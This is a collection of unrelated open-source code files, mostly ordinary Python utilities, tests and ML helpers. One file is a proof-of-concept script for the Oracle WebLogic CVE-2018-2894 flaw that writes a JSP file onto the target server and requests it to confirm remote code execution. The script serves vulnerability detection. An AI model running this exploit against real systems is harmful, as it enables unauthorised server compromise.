def move(self, node: T, parent: Optional[T], index: Optional[int] = None) -> None:
"""Set new parent for a ``node``. ``Parent`` can be ``None``,
indicating it's added to the top.
>>> tree = Tree()
>>> tree.add('n1')
>>> tree.add('n2', parent='n1')
>>> tree.add('n3', parent='n1')
>>> tree.nodes
['n1', 'n2', 'n3']
>>> tree.move('n2', 'n3')
>>> tree.get_parent('n2')
'n3'
>>> tree.get_children('n3')
['n2']
>>> tree.nodes
['n1', 'n3', 'n2']
If a node contains children, those are also moved:
>>> tree.add('n4')
>>> tree.nodes
['n1', 'n3', 'n2', 'n4']
>>> tree.move('n1', 'n4')
>>> tree.get_parent('n1')
'n4'
>>> list(tree.get_all_children('n4'))
['n1', 'n3', 'n2']
>>> tree.nodes
['n4', 'n1', 'n3', 'n2']
"""
if parent is self.get_parent(node):
return
# Remove all node references:
old_parent = self.get_parent(node)
self._children[old_parent].remove(node)
self._nodes.remove(node)
if old_parent:
del self._parents[node]
self._add(node, parent, index)
# reorganize children in nodes list
for c in self._children[node]:
self._reparent_nodes(c, node)
|
tests/test_init.py | fariddarabi/fastapi-chameleon | 118 | 12686467 | import pytest
import fastapi_chameleon as fc
from fastapi_chameleon.exceptions import FastAPIChameleonException
def test_cannot_decorate_with_missing_init():
fc.engine.clear()
with pytest.raises(FastAPIChameleonException):
@fc.template('home/index.pt')
def view_method(a, b, c):
return {"a": a, "b": b, "c": c}
view_method(1, 2, 3)
def test_can_call_init_with_good_path(test_templates_path):
fc.global_init(str(test_templates_path), cache_init=False)
# Clear paths so as to no affect future tests
fc.engine.clear()
def test_cannot_call_init_with_bad_path(test_templates_path):
bad_path = test_templates_path / "missing"
with pytest.raises(Exception):
fc.global_init(str(bad_path), cache_init=False)
|
mongomock/object_id.py | moonso/mongomock | 574 | 12686474 | <reponame>moonso/mongomock
import uuid
class ObjectId(object):
def __init__(self, id=None):
super(ObjectId, self).__init__()
if id is None:
self._id = uuid.uuid1()
else:
self._id = uuid.UUID(id)
def __eq__(self, other):
return isinstance(other, ObjectId) and other._id == self._id
def __ne__(self, other):
return not self == other
def __hash__(self):
return hash(self._id)
def __repr__(self):
return 'ObjectId({0})'.format(self._id)
def __str__(self):
return str(self._id)
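# Illustrative usage (not part of the original module): two ObjectId instances
# compare equal only when built from the same id string.
#   >>> a = ObjectId('12345678-1234-5678-1234-567812345678')
#   >>> b = ObjectId('12345678-1234-5678-1234-567812345678')
#   >>> a == b
#   True
#   >>> a == ObjectId()
#   False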
|
test/test_render_visual.py | QiukuZ/svox2 | 1,724 | 12686488 | <gh_stars>1000+
import svox2
import torch
import numpy as np
from util import Timing
from matplotlib import pyplot as plt
device='cuda:0'
GRID_FILE = 'lego.npy'
grid = svox2.SparseGrid(reso=256, device='cpu', radius=1.3256)
data = torch.from_numpy(np.load(GRID_FILE)).view(-1, grid.data_dim)
grid.sh_data.data = data[..., 1:]
grid.density_data.data = data[..., :1]
# grid.resample(128, use_z_order=True)
grid = grid.cuda()
c2w = torch.tensor([
[ -0.9999999403953552, 0.0, 0.0, 0.0 ],
[ 0.0, -0.7341099977493286, 0.6790305972099304, 2.737260103225708 ],
[ 0.0, 0.6790306568145752, 0.7341098785400391, 2.959291696548462 ],
[ 0.0, 0.0, 0.0, 1.0 ],
], device=device)
with torch.no_grad():
width = height = 800
fx = fy = 1111
origins = c2w[None, :3, 3].expand(height * width, -1).contiguous()
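    # Build a pinhole-camera ray per pixel: shift pixel coordinates to the
    # principal point, scale by the focal length, then rotate the camera-space
    # directions into world space with the c2w rotation before normalizing.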
yy, xx = torch.meshgrid(
torch.arange(height, dtype=torch.float64, device=c2w.device),
torch.arange(width, dtype=torch.float64, device=c2w.device),
)
xx = (xx - width * 0.5) / float(fx)
yy = (yy - height * 0.5) / float(fy)
zz = torch.ones_like(xx)
dirs = torch.stack((xx, -yy, -zz), dim=-1)
dirs /= torch.norm(dirs, dim=-1, keepdim=True)
dirs = dirs.reshape(-1, 3)
del xx, yy, zz
dirs = torch.matmul(c2w[None, :3, :3].double(), dirs[..., None])[..., 0].float()
dirs = dirs / torch.norm(dirs, dim=-1, keepdim=True)
rays = svox2.Rays(origins, dirs)
for i in range(5):
with Timing("ours"):
im = grid.volume_render(rays, use_kernel=True)
im = im.reshape(height, width, 3)
im = im.detach().clamp_(0.0, 1.0).cpu()
plt.imshow(im)
plt.show()
|
nider/__init__.py | rockykitamura/nider | 123 | 12686494 | <gh_stars>100-1000
# -*- coding: utf-8 -*-
"""Top-level package for nider."""
__author__ = """<NAME>"""
__email__ = '<EMAIL>'
__version__ = '0.5.0'
|
pfrl/wrappers/monitor.py | ummavi/pfrl-1 | 824 | 12686500 | import time
from logging import getLogger
from gym.wrappers import Monitor as _GymMonitor
from gym.wrappers.monitoring.stats_recorder import StatsRecorder as _GymStatsRecorder
class Monitor(_GymMonitor):
"""`Monitor` with PFRL's `ContinuingTimeLimit` support.
`Agent` in PFRL might reset the env even when `done=False`
if `ContinuingTimeLimit` returns `info['needs_reset']=True`,
which is not expected for `gym.Monitor`.
For details, see
https://github.com/openai/gym/blob/master/gym/wrappers/monitor.py
"""
def _start(
self,
directory,
video_callable=None,
force=False,
resume=False,
write_upon_reset=False,
uid=None,
mode=None,
):
if self.env_semantics_autoreset:
raise NotImplementedError(
"Detect 'semantics.autoreset=True' in `env.metadata`, "
"which means the env is from deprecated OpenAI Universe."
)
ret = super()._start(
directory=directory,
video_callable=video_callable,
force=force,
resume=resume,
write_upon_reset=write_upon_reset,
uid=uid,
mode=mode,
)
env_id = self.stats_recorder.env_id
self.stats_recorder = _StatsRecorder(
directory,
"{}.episode_batch.{}".format(self.file_prefix, self.file_infix),
autoreset=False,
env_id=env_id,
)
if mode is not None:
self._set_mode(mode)
return ret
class _StatsRecorder(_GymStatsRecorder):
"""`StatsRecorder` with PFRL's `ContinuingTimeLimit` support.
For details, see
https://github.com/openai/gym/blob/master/gym/wrappers/monitoring/stats_recorder.py
"""
def __init__(
self,
directory,
file_prefix,
autoreset=False,
env_id=None,
logger=getLogger(__name__),
):
super().__init__(directory, file_prefix, autoreset=autoreset, env_id=env_id)
self._save_completed = True
self.logger = logger
def before_reset(self):
assert not self.closed
if self.done is not None and not self.done and self.steps > 0:
self.logger.debug(
"Tried to reset the env which is not done=True. "
"StatsRecorder completes the last episode."
)
self.save_complete()
self.done = False
if self.initial_reset_timestamp is None:
self.initial_reset_timestamp = time.time()
def after_step(self, observation, reward, done, info):
self._save_completed = False
return super().after_step(observation, reward, done, info)
def save_complete(self):
if not self._save_completed:
super().save_complete()
self._save_completed = True
def close(self):
self.save_complete()
super().close()
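# Minimal usage sketch (illustrative only; the environment id and output
# directory below are assumptions, not part of this module):
#   import gym
#   from pfrl.wrappers import Monitor
#   env = Monitor(gym.make("CartPole-v0"), directory="results/monitor")
#   obs = env.reset()
#   obs, reward, done, info = env.step(env.action_space.sample())
#   env.close()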
|
2018/CVE-2018-2894/poc/pocsploit/CVE-2018-2894.py | hjyuan/reapoc | 421 | 12686511 | import requests
# Vuln Base Info
def info():
return {
"author": "cckuailong",
"name": '''Oracle WebLogic RCE''',
"description": '''Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server.''',
"severity": "critical",
"references": [
"https://blog.detectify.com/2018/11/14/technical-explanation-of-cve-2018-2894-oracle-weblogic-rce/",
"https://github.com/vulhub/vulhub/tree/fda47b97c7d2809660a4471539cd0e6dbf8fac8c/weblogic/CVE-2018-2894"
],
"classification": {
"cvss-metrics": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"cvss-score": "",
"cve-id": "CVE-2018-2894",
"cwe-id": ""
},
"metadata":{
"vuln-target": "",
},
"tags": ["cve", "cve2018", "oracle", "weblogic", "rce"],
}
# Vender Fingerprint
def fingerprint(url):
return True
# Proof of Concept
def poc(url):
result = {}
try:
url = format_url(url)
path = """/ws_utc/resources/setting/options"""
method = "POST"
data = """setting_id=general&BasicConfigOptions.workDir=%2Fu01%2Foracle%2Fuser_projects%2Fdomains%2Fbase_domain%2Fservers%2FAdminServer%2Ftmp%2F_WL_internal%2Fcom.oracle.webservices.wls.ws-testclient-app-wls%2F4mcj4y%2Fwar%2Fcss&BasicConfigOptions.proxyHost=&BasicConfigOptions.proxyPort=80"""
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
path = """/ws_utc/resources/setting/keystore"""
method = "POST"
data = """------WebKitFormBoundaryuim0dyiDSPBPu31g
Content-Disposition: form-data; name="ks_name"
{{randstr}}
------WebKitFormBoundaryuim0dyiDSPBPu31g
Content-Disposition: form-data; name="ks_edit_mode"
false
------WebKitFormBoundaryuim0dyiDSPBPu31g
Content-Disposition: form-data; name="ks_password_front"
------WebKitFormBoundaryuim0dyiDSPBPu31g
Content-Disposition: form-data; name="ks_password"
------WebKitFormBoundaryuim0dyiDSPBPu31g
Content-Disposition: form-data; name="ks_password_changed"
false
------WebKitFormBoundaryuim0dyiDSPBPu31g
Content-Disposition: form-data; name="ks_filename"; filename="{{randstr}}.jsp"
Content-Type: application/octet-stream
<%@ page import="java.util.*,java.io.*"%>
<%@ page import="java.security.MessageDigest"%>
<%
String cve = "CVE-2018-2894";
MessageDigest alg = MessageDigest.getInstance("MD5");
alg.reset();
alg.update(cve.getBytes());
byte[] digest = alg.digest();
StringBuffer hashedpasswd = new StringBuffer();
String hx;
for (int i=0;i<digest.length;i++){
hx = Integer.toHexString(0xFF & digest[i]);
//0x03 is equal to 0x3, but we need 0x03 for our md5sum
if(hx.length() == 1){hx = "0" + hx;}
hashedpasswd.append(hx);
}
out.println(hashedpasswd.toString());
%>
------WebKitFormBoundaryuim0dyiDSPBPu31g--"""
headers = {'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundaryuim0dyiDSPBPu31g'}
resp1 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
path = """/ws_utc/css/config/keystore/{{id}}_{{randstr}}.jsp"""
method = "GET"
data = """"""
headers = {}
resp2 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
if ("""26ec00a3a03f6bfc5226fd121567bb58""" in resp2.text):
result["success"] = True
result["info"] = info()
result["payload"] = url+path
except:
result["success"] = False
return result
# Exploit, can be same with poc()
def exp(url):
return poc(url)
# Utils
def format_url(url):
url = url.strip()
if not ( url.startswith('http://') or url.startswith('https://') ):
url = 'http://' + url
url = url.rstrip('/')
return url |
tensorflow/compiler/tests/reverse_ops_test.py | abhaikollara/tensorflow | 848 | 12686577 | <gh_stars>100-1000
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Functional tests for XLA Reverse Ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import itertools
import numpy as np
from tensorflow.compiler.tests import xla_test
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.ops import array_ops
from tensorflow.python.platform import googletest
class ReverseOpsTest(xla_test.XLATestCase):
def testReverseOneDim(self):
shape = (7, 5, 9, 11)
for revdim in range(-len(shape), len(shape)):
self._AssertReverseEqual([revdim], shape)
def testReverseMoreThanOneDim(self):
shape = (7, 5, 9, 11)
# The offset is used to test various (but not all) combinations of negative
# and positive axis indices that are guaranteed to not collide at the same
# index.
for revdims in itertools.chain.from_iterable(
itertools.combinations(range(-offset,
len(shape) - offset), k)
for k in range(2,
len(shape) + 1)
for offset in range(0, len(shape))):
self._AssertReverseEqual(revdims, shape)
def _AssertReverseEqual(self, revdims, shape):
np.random.seed(120)
pval = np.random.randint(0, 100, size=shape).astype(float)
with self.session():
with self.test_scope():
p = array_ops.placeholder(dtypes.int32, shape=shape)
axis = constant_op.constant(
np.array(revdims, dtype=np.int32),
shape=(len(revdims),),
dtype=dtypes.int32)
rval = array_ops.reverse(p, axis).eval({p: pval})
slices = [
slice(-1, None, -1)
if d in revdims or d - len(shape) in revdims else slice(None)
for d in range(len(shape))
]
self.assertEqual(pval[slices].flatten().tolist(), rval.flatten().tolist())
if __name__ == '__main__':
googletest.main()
|
setup.py | jameswilkerson/elex | 183 | 12686591 | <reponame>jameswilkerson/elex<filename>setup.py
import os.path
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
def read(filename):
return open(os.path.join(os.path.dirname(__file__), filename)).read()
setup(
name="elex",
version="2.4.4",
author="<NAME>, <NAME>",
author_email="<EMAIL>, <EMAIL>",
url="https://github.com/newsdev/elex",
description="Client for parsing the Associated Press's elections API",
long_description=read("README.rst"),
packages=["elex", "elex.cli", "elex.api", "tests"],
entry_points={"console_scripts": ("elex = elex.cli:main",)},
license="Apache License 2.0",
keywords="election race candidate democracy news associated press",
install_requires=[
"CacheControl==0.12.*",
"cement==2.10.2",
"lockfile==0.12.2",
"pymongo==3.3",
"python-dateutil==2.7.*",
"requests==2.20.*",
"ujson==1.35",
],
classifiers=[
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"Topic :: Software Development :: Libraries :: Python Modules",
"Programming Language :: Python",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.6",
],
)
|
python/pygcylon/examples/util.py | deHasara/cylon | 229 | 12686593 | ##
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##
'''
utils for examples
'''
import cupy as cp
import cudf
def create_sorted_cudf_df(ncols, nrows, start=0, step=1):
df_local = cudf.DataFrame()
data_start = start
for i in range(ncols):
df_local["col-" + str(i)] = cp.arange(start=data_start, stop=data_start + nrows * step, step=step, dtype="int64")
data_start += nrows * step
return df_local
def create_random_data_df(ncols, nrows, low=0, high=1000000000000):
df_local = cudf.DataFrame()
for i in range(ncols):
df_local["col-" + str(i)] = cp.random.randint(low=low, high=high, size=nrows, dtype="int64")
return df_local
def random_data_df(nrows, col_lows=[0, 100], col_highs=[100, 200]):
df_local = cudf.DataFrame()
for i in range(len(col_lows)):
df_local["col-" + str(i)] = cp.random.randint(low=col_lows[i], high=col_highs[i], size=nrows, dtype="int64")
return df_local
import string
import random
def random_str(size=6, chars=string.ascii_uppercase + string.digits):
"""
generate a random string with given size and char list
source: https://stackoverflow.com/questions/2257441/random-string-generation-with-upper-case-letters-and-digits?rq=1
"""
return ''.join(random.choice(chars) for _ in range(size))
def create_random_str_df(ncols, nrows, min_digits=2, max_digits=7):
df_local = cudf.DataFrame()
for i in range(ncols):
df_local["col-" + str(i)] = [random_str(min_digits + i % (max_digits - min_digits)) for i in range(nrows)]
return df_local
def get_size(df_size_str):
if df_size_str.endswith("MB"):
df_size = df_size_str[:-2]
df_size = int(df_size) * 1000000
return df_size
elif df_size_str.endswith("GB"):
df_size = df_size_str[:-2]
df_size = int(df_size) * 1000000000
return df_size
else:
raise ValueError("Size has to be either MB or GB")
def get_rows(df_size_str, ncols):
df_size = get_size(df_size_str)
# each element is int64, so 8 bytes
return int(df_size / (ncols * 8))
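# Quick self-check sketch (illustrative only; runs where cupy/cudf are available):
if __name__ == "__main__":
    demo_df = create_sorted_cudf_df(ncols=2, nrows=4)
    print(demo_df)
    # "10MB" of int64 values spread over 4 columns -> 10_000_000 / (4 * 8) = 312500 rows
    print(get_rows("10MB", 4))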
|
CLUE_Rock_Paper_Scissors/very-simple/code.py | gamblor21/Adafruit_Learning_System_Guides | 665 | 12686598 | <reponame>gamblor21/Adafruit_Learning_System_Guides<gh_stars>100-1000
# clue-verysimple-rpsgame v1.0
# CircuitPython rock paper scissors game simple text game
# based on https://www.youtube.com/watch?v=dhaaZQyBP2g
# Tested with CLUE and Circuit Playground Bluefruit (Alpha)
# and CircuitPython and 5.3.0
# copy this file to CLUE/CPB board as code.py
# MIT License
# Copyright (c) 2015 <NAME>, KidsCanCode LLC
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import random
moves = ["r", "p", "s"]
player_wins = ["pr", "sp", "rs"]
print("Rock, paper scissors game: enter first letter for move or q for quit")
while True:
player_move = input("Your move: ")
if player_move == "q":
break
computer_move = random.choice(moves)
print("You:", player_move)
print("Me:", computer_move)
if player_move == computer_move:
print("Tie")
elif player_move + computer_move in player_wins:
print("You win!")
else:
print("You lose!")
|
test/misc/mocktest.py | skysightsoaringweather/wrf-python | 315 | 12686599 | import sys
import os
try:
from unittest.mock import MagicMock
except ImportError:
from mock import Mock as MagicMock
class Mock(MagicMock):
@classmethod
def __getattr__(cls, name):
return Mock()
MOCK_MODULES = ["numpy", "numpy.ma", "xarray", "cartopy",
"pandas", "matplotlib", "netCDF4", "mpl_toolkits.basemap",
"wrf._wrffortran"]
sys.modules.update((mod_name, Mock()) for mod_name in MOCK_MODULES)
consts = {"DEFAULT_FILL": 9.9692099683868690E36,
"DEFAULT_FILL_INT8": -127,
"DEFAULT_FILL_INT16": -32767,
"DEFAULT_FILL_INT32": -2147483647,
"DEFAULT_FILL_INT64": -9223372036854775806,
"DEFAULT_FILL_FLOAT": 9.9692099683868690E36,
"DEFAULT_FILL_DOUBLE": 9.9692099683868690E36,
"fomp_sched_static": 1,
"fomp_sched_dynamic": 2,
"fomp_sched_guided": 3,
"fomp_sched_auto": 4}
class MockWrfConstants(object):
def __init__(self):
self.__dict__ = consts
def mock_asscalar(val):
return float(val)
sys.modules["wrf._wrffortran"].wrf_constants = MockWrfConstants()
sys.modules["wrf._wrffortran"].omp_constants = MockWrfConstants()
sys.modules["numpy"].asscalar = mock_asscalar
try:
import wrf
except ImportError:
pass
print(wrf.get_coord_pairs.__doc__)
|
py/base/EretPreambleSequence.py | Wlgen/force-riscv | 111 | 12686606 | #
# Copyright (C) [2020] Futurewei Technologies, Inc.
#
# FORCE-RISCV is licensed under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES
# OF ANY KIND, EITHER EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
# NON-INFRINGEMENT, MERCHANTABILITY OR FIT FOR A PARTICULAR PURPOSE.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# classes, code related to Eret preamble sequence.
from base.Sequence import Sequence
# -------------------------------------------------------------------------------------------------------
# EretPreambleSequence to provide base class for eret preamble sequence.
# -------------------------------------------------------------------------------------------------------
class EretPreambleSequence(Sequence):
def __init__(self, gen_thread):
super().__init__(gen_thread)
def generate(self, **kargs):
pass
|
rigl/experimental/jax/datasets/dataset_base.py | xhchrn/rigl | 276 | 12686620 | # coding=utf-8
# Copyright 2021 RigL Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Dataset Classes.
Dataset abstraction/factory to allow us to easily use tensorflow datasets (TFDS)
with JAX/FLAX, by defining a bunch of wrappers, including preprocessing.
"""
import abc
from typing import MutableMapping, Optional
import tensorflow.compat.v2 as tf
import tensorflow_datasets as tfds
class Dataset(metaclass=abc.ABCMeta):
"""Base class for datasets.
Attributes:
DATAKEY: The key used for the data component of a Tensorflow Dataset
(TFDS) sample, e.g. 'image' for image datasets.
LABELKEY: The key used fot the label component of a Tensorflow Dataset
sample, i.e. 'label'.
name: The TFDS name of the dataset.
batch_size: The batch size to use for the training dataset.
batch_size_test: The batch size to use for the test dataset.
num_classes: the number of supervised classes in the dataset.
shape: the shape of an input data array.
"""
DATAKEY: Optional[str] = None
LABELKEY: str = 'label'
def __init__(self,
name,
batch_size,
batch_size_test,
shuffle_buffer_size,
prefetch_size = 1,
seed = None):
"""Base class for datasets.
Args:
name: The TFDS name of the dataset.
batch_size: The batch size to use for the training dataset.
batch_size_test: The batch size to use for the test dataset.
shuffle_buffer_size: The buffer size to use for dataset shuffling.
prefetch_size: The number of mini-batches to prefetch.
seed: The random seed used to shuffle.
Returns:
A Dataset object.
"""
super().__init__()
self.name = name
self.batch_size = batch_size
self.batch_size_test = batch_size_test
self._shuffle_buffer_size = shuffle_buffer_size
self._prefetch_size = prefetch_size
self._train_ds, self._train_info = tfds.load(
self.name,
split=tfds.Split.TRAIN,
data_dir=self._dataset_dir(),
with_info=True)
self._train_ds = self._train_ds.shuffle(
self._shuffle_buffer_size,
seed).map(self.preprocess).cache().map(self.augment).batch(
self.batch_size, drop_remainder=True).prefetch(self._prefetch_size)
self._test_ds, self._test_info = tfds.load(
self.name,
split=tfds.Split.TEST,
data_dir=self._dataset_dir(),
with_info=True)
self._test_ds = self._test_ds.map(self.preprocess).cache().batch(
self.batch_size_test).prefetch(self._prefetch_size)
self.num_classes = self._train_info.features['label'].num_classes
self.shape = self._train_info.features['image'].shape
def _dataset_dir(self):
"""Returns the dataset path for the TFDS data."""
return None
def get_train(self):
"""Returns the training dataset."""
return iter(tfds.as_numpy(self._train_ds))
def get_train_len(self):
"""Returns the length of the training dataset."""
return self._train_info.splits['train'].num_examples
def get_test(self):
"""Returns the test dataset."""
return iter(tfds.as_numpy(self._test_ds))
def get_test_len(self):
"""Returns the length of the test dataset."""
return self._test_info.splits['test'].num_examples
def preprocess(
self, data):
"""Preprocessing fn used by TFDS map for normalization.
This function is for transformations that can be cached, e.g.
normalization/whitening.
Args:
data: Data sample.
Returns:
Data after being normalized/transformed.
"""
return data
def augment(
self, data):
"""Preprocessing fn used by TFDS map for augmentation at training time.
This function is for transformations that should not be cached, e.g. random
augmentation that should change for every sample, and are only applied at
training time.
Args:
data: Data sample.
Returns:
Data after being augmented/transformed.
"""
return data
class ImageDataset(Dataset):
"""Base class for image datasets."""
DATAKEY = 'image'
def preprocess(
self, data):
"""Preprocessing function used by TFDS map for normalization.
This function is for transformations that can be cached, e.g.
normalization/whitening.
Args:
data: Data sample.
Returns:
Data after being normalized/transformed.
"""
data = super().preprocess(data)
# Ensure we only provide the image and label, stripping out other keys.
return dict((key, val)
for key, val in data.items()
if key in [self.LABELKEY, self.DATAKEY])
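# Illustrative sketch of a concrete subclass (the 'mnist' TFDS name and the
# [0, 1] rescaling below are assumptions for this example, not part of the
# original module's API):
class MNISTDataset(ImageDataset):
  """Example MNIST dataset that rescales pixel values to [0, 1]."""
  def __init__(self, batch_size=128, batch_size_test=128, shuffle_buffer_size=1024):
    super().__init__('mnist', batch_size, batch_size_test, shuffle_buffer_size)
  def preprocess(self, data):
    data = super().preprocess(data)
    data[self.DATAKEY] = tf.cast(data[self.DATAKEY], tf.float32) / 255.
    return data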
|
ambari-server/src/main/resources/scripts/takeover_config_merge.py | likenamehaojie/Apache-Ambari-ZH | 1,664 | 12686626 | <filename>ambari-server/src/main/resources/scripts/takeover_config_merge.py
#!/usr/bin/env python
'''
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
import optparse
import sys
import os
import logging
import tempfile
import json
import re
import base64
import time
import xml
import xml.etree.ElementTree as ET
import StringIO
import ConfigParser
from optparse import OptionGroup
logger = logging.getLogger('AmbariTakeoverConfigMerge')
CONFIG_MAPPING_HELP_TEXT = """
JSON file should contain a map of {regex_path : <service>-log4j}
Example:
{".+/hadoop/.+/log4j.properties" : "hdfs-log4j",
".+/etc/zookeeper/conf/log4j.properties" : "zookeeper-log4j"
"c6401.ambari.apache.org/etc/hive/conf/log4j.properties" : "hive-log4j"}
"""
LICENSE = """
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""
class Parser:
pass
class ShParser(Parser):
def read_data_to_map(self, path):
with open(path, 'r') as file:
file_content = file.read()
return {"content" : file_content}, None
class YamlParser(Parser): # Uses the YAML parser to read data into a map
def read_data_to_map(self, path):
try:
import yaml
except ImportError:
logger.error("Module PyYAML not installed. Please try to execute \"pip install pyyaml\" for installing PyYAML module.")
sys.exit(1)
configurations = {}
with open(path, 'r') as file:
try:
for name, value in yaml.load(file).iteritems():
if name != None:
configurations[name] = str(value)
except:
logger.error("Couldn't parse {0} file. Skipping ...".format(path))
return None, None
return configurations, None
class PropertiesParser(Parser): # Uses ConfigParser to read data into a map
def read_data_to_map(self, path):
configurations = {}
try :
#Adding dummy section to properties file content for use ConfigParser
properties_file_content = StringIO.StringIO()
properties_file_content.write('[dummysection]\n')
properties_file_content.write(open(path).read())
properties_file_content.seek(0, os.SEEK_SET)
cp = ConfigParser.ConfigParser()
cp.optionxform = str
cp.readfp(properties_file_content)
for section in cp._sections:
for name, value in cp._sections[section].iteritems():
if name != None:
configurations[name] = value
del configurations['__name__']
except:
logger.exception("ConfigParser error: ")
return configurations, None
class XmlParser(Parser): # Uses an ElementTree parser to read data into a map
def read_data_to_map(self, path):
configurations = {}
properties_attributes = {}
tree = ET.parse(path)
root = tree.getroot()
for properties in root.getiterator('property'):
name = properties.find('name')
value = properties.find('value')
#TODO support all properties attributes
final = properties.find('final')
if name != None:
name_text = name.text if name.text else ""
else:
logger.warn("No name is found for one of the properties in {0}, ignoring it".format(path))
continue
if value != None:
value_text = value.text if value.text else ""
else:
logger.warn("No value is found for \"{0}\" in {1}, using empty string for it".format(name_text, path))
value_text = ""
if final != None:
final_text = final.text if final.text else ""
properties_attributes[name_text] = final_text
configurations[name_text] = value_text
logger.debug("Following configurations found in {0}:\n{1}".format(path, configurations))
return configurations, properties_attributes
class ConfigMerge:
CONTENT_UNKNOWN_FILES_MAPPING_FILE = {}
LEFT_INPUT_DIR = "/tmp/left"
RIGHT_INPUT_DIR = "/tmp/right"
INPUT_DIR = '/etc/hadoop'
OUTPUT_DIR = '/tmp'
OUT_FILENAME = 'ambari_takeover_config_merge.out'
JSON_FILENAME = 'ambari_takeover_config_merge.json'
PARSER_BY_EXTENSIONS = {'.xml' : XmlParser(), '.yaml' : YamlParser(), '.properties' : PropertiesParser(), '.sh' : ShParser()}
SUPPORTED_EXTENSIONS = ['.xml', '.yaml', '.properties', '.sh']
SUPPORTED_FILENAME_ENDINGS = {".sh" : "-env"}
UNKNOWN_FILES_MAPPING_FILE = None
CONFIGS_WITH_CONTENT = ['pig-properties', '-log4j']
NOT_MAPPED_FILES = ['log4j.properties']
config_files_map = {}
left_file_paths = None
right_file_paths = None
def __init__(self, config_files_map=None, left_file_paths=None, right_file_paths=None):
self.config_files_map = config_files_map
self.left_file_paths = left_file_paths
self.right_file_paths = right_file_paths
@staticmethod
def get_all_supported_files_grouped_by_name(extensions=SUPPORTED_EXTENSIONS, directory=INPUT_DIR):
filePaths = {}
for dirName, subdirList, fileList in os.walk(directory, followlinks=True):
for file in fileList:
root, ext = os.path.splitext(file)
if ext in extensions:
file_path = os.path.join(dirName, file)
if ext in ConfigMerge.SUPPORTED_FILENAME_ENDINGS and not ConfigMerge.SUPPORTED_FILENAME_ENDINGS[ext] in root:
logger.warn("File {0} is not configurable by Ambari. Skipping...".format(file_path))
continue
config_name = None
if ConfigMerge.UNKNOWN_FILES_MAPPING_FILE:
